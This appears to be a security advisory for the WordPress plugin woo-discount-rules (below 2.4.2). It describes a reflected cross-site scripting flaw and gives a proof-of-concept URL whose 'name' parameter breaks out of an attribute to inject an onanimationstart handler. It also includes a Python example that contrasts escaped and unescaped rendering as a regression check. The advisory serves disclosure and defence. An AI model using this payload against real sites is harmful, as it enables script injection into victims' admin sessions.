The plugin does not escape a parameter before outputting it back in an attribute of the plugin’s discount rule page, leading to Reflected Cross-Site Scripting.
https://example.com/wp-admin/admin.php?page=woo_discount_rules&name="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
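The following is an added example, not the plugin's code: it renders the reflected `name` value into a hypothetical `<input>` attribute with and without attribute-context escaping, then parses the result to show which attributes the element ends up with. The template, the `rule_name` field and the function names are assumptions; Python's `html.escape` stands in for the attribute escaping a WordPress plugin would get from `esc_attr()`.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Request URL copied from the proof of concept on this page.
POC_URL = ('https://example.com/wp-admin/admin.php?page=woo_discount_rules'
           '&name="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//')
TEMPLATE = '<input type="text" name="rule_name" value="{}">'  # hypothetical markup


def render_unescaped(name):
    # The reflected value is placed in the attribute as received.
    return TEMPLATE.format(name)


def render_escaped(name):
    # Attribute-context escaping: &, <, > and both quote characters become entities.
    return TEMPLATE.format(html.escape(name, quote=True))


class _InputAttrs(HTMLParser):
    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def input_attributes(markup):
    """Attributes an HTML parser sees on the <input> element."""
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def injected_attributes(markup, expected=("type", "name", "value")):
    """Attribute names present in the output that the template never emits."""
    return sorted(set(input_attributes(markup)) - set(expected))


def name_from_url(url):
    return parse_qs(urlsplit(url).query)["name"][0]


if __name__ == "__main__":
    value = name_from_url(POC_URL)
    print(injected_attributes(render_unescaped(value)), injected_attributes(render_escaped(value)))
```

The same parse-and-compare check can serve as a regression test for any template that reflects request parameters into attributes.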
CPE

Name | Operator | Version |
---|---|---|
woo-discount-rules | lt | 2.4.2 |